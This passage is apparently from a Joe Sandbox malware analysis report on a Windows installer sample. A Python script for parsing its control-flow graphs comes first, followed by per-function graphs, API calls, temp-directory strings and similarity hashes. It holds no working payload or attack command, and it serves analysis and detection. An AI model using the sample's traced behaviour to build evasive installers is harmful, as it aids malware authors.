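def internal_calls(g: CFG) -> Set[int]:
    return {t for b in g.blocks.values() for t in b.calls}


def block_for(g: CFG, addr: int) -> Optional[int]:
    """Map an instruction address (e.g. an API call's 'ref:') to the basic block holding it."""
    for b in g.blocks.values():
        if b.start <= addr <= b.end:
            return b.node_id
    return None


def sinks(g: CFG) -> Set[int]:
    """Blocks without successors: the function's return paths."""
    adj = successors(g)
    return {n for n in g.blocks if not adj.get(n)}


if __name__ == "__main__":
    g = parse_cfg(SAMPLE)
    print(f"{len(g.blocks)} blocks, {len(g.edges)} edges, entry node {g.entry}")
    print("API call sites:", dict(api_call_counts(g)))
    print("intra-module calls:", [hex(t) for t in sorted(internal_calls(g))])
    print("block holding 0x4055D6:", block_for(g, 0x4055D6))
    print("return blocks:", sorted(sinks(g)))
```

For the sample, the parser yields 13 blocks and 19 edges, all reachable from node 630; the API call-site counts (lstrlenW 2, lstrcatW 1, SetWindowTextW 1, SendMessageW 3) match the seven entries in the 0x405569 APIs list, and block_for resolves the SetWindowTextW reference at 0x4055D6 to node 640 and the two lstrlenW references at 0x4055A1 and 0x4055B1 to nodes 633 and 637. The same parser works unchanged on the longer listings for 0x406544, 0x40176f and 0x4032b4 on this page, which use the 'call <addr> * 2' form as well.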

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 644 4032b4-4032cb 645 4032d4-4032dc 644->645 646 4032cd 644->646 647 4032e3-4032e8 645->647 648 4032de 645->648 646->645 649 4032f8-403305 call 403499 647->649 650 4032ea-4032f3 call 4034af 647->650 648->647 654 403450 649->654 655 40330b-40330f 649->655 650->649 658 403452-403453 654->658 656 403315-403335 GetTickCount call 406a2f 655->656 657 403439-40343b 655->657 668 40348f 656->668 670 40333b-403343 656->670 659 403484-403488 657->659 660 40343d-403440 657->660 662 403492-403496 658->662 663 403455-40345b 659->663 664 40348a 659->664 665 403442 660->665 666 403445-40344e call 403499 660->666 671 403460-40346e call 403499 663->671 672 40345d 663->672 664->668 665->666 666->654 677 40348c 666->677 668->662 674 403345 670->674 675 403348-403356 call 403499 670->675 671->654 680 403470-40347c call 4060a9 671->680 672->671 674->675 675->654 683 40335c-403365 675->683 677->668 686 403435-403437 680->686 687 40347e-403481 680->687 685 40336b-403388 call 406a4f 683->685 690 403431-403433 685->690 691 40338e-4033a5 GetTickCount 685->691 686->658 687->659 690->658 692 4033f0-4033f2 691->692 693 4033a7-4033af 691->693 696 4033f4-4033f8 692->696 697 403425-403429 692->697 694 4033b1-4033b5 693->694 695 4033b7-4033e8 MulDiv wsprintfW call 405569 693->695 694->692 694->695 702 4033ed 695->702 700 4033fa-4033ff call 4060a9 696->700 701 40340d-403413 696->701 697->670 698 40342f 697->698 698->668 705 403404-403406 700->705 704 403419-40341d 701->704 702->692 704->685 706 403423 704->706 705->686 707 403408-40340b 705->707 706->668 707->704
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountTick$wsprintf
                                                                                                                                                                            • String ID: ... %d%%$G8@
                                                                                                                                                                            • API String ID: 551687249-649311722
                                                                                                                                                                            • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 708 406864-406884 GetSystemDirectoryW 709 406886 708->709 710 406888-40688a 708->710 709->710 711 40689b-40689d 710->711 712 40688c-406895 710->712 714 40689e-4068d1 wsprintfW LoadLibraryExW 711->714 712->711 713 406897-406899 712->713 713->714
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                            • wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                                                                                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 715 405a38-405a83 CreateDirectoryW 716 405a85-405a87 715->716 717 405a89-405a96 GetLastError 715->717 718 405ab0-405ab2 716->718 717->718 719 405a98-405aac SetFileSecurityW 717->719 719->716 720 405aae GetLastError 719->720 720->718
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405A8F
                                                                                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00405AAE
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 3449924974-823278215
                                                                                                                                                                            • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
                                                                                                                                                                            • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                            • Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 721 406026-406032 722 406033-406067 GetTickCount GetTempFileNameW 721->722 723 406076-406078 722->723 724 406069-40606b 722->724 725 406070-406073 723->725 724->722 726 40606d 724->726 726->725
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00406044
                                                                                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                            • API String ID: 1716503409-44229769
                                                                                                                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                                                                                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                            • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 810 4015c1-4015d5 call 402da6 call 405e81 815 401631-401634 810->815 816 4015d7-4015ea call 405e03 810->816 818 401663-4022f6 call 401423 815->818 819 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 815->819 824 401604-401607 call 405ab5 816->824 825 4015ec-4015ef 816->825 834 402c2a-402c39 818->834 835 40292e-402935 818->835 819->834 837 40165b-40165e 819->837 833 40160c-40160e 824->833 825->824 830 4015f1-4015f8 call 405ad2 825->830 830->824 841 4015fa-4015fd call 405a38 830->841 839 401610-401615 833->839 840 401627-40162f 833->840 835->834 837->834 843 401624 839->843 844 401617-401622 GetFileAttributesW 839->844 840->815 840->816 846 401602 841->846 843->840 844->840 844->843 846->833
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                              • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                              • Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                            Strings
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner, xrefs: 00401640
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
• API String ID: 1892508949-2682599531
• Opcode ID: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
• Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
• Opcode Fuzzy Hash: d41762341c72ae5ef60e9dee6b9a76731464eaafda88a5e7a8ce52a2a1f15c18
• Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
APIs
• RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,: Completed,?,?,0040663C,80000002), ref: 0040641B
• RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 00406426
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CloseQueryValue
• String ID: : Completed
• API String ID: 3356406503-2954849223
• Opcode ID: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
• Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
• Opcode Fuzzy Hash: 82c84a090bdb8ca3c021c82de9a83593d1fd11d46156a85a05ce0c6f6e9e8152
• Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
• Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
• Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
• Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
• Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
• Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
• Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
• Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
• Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
• Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
• Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
• Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
• Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                                                                                                                                            • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                            • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
• Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
• Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
• Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
• Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
• Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
• Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45
APIs
• GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
  • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
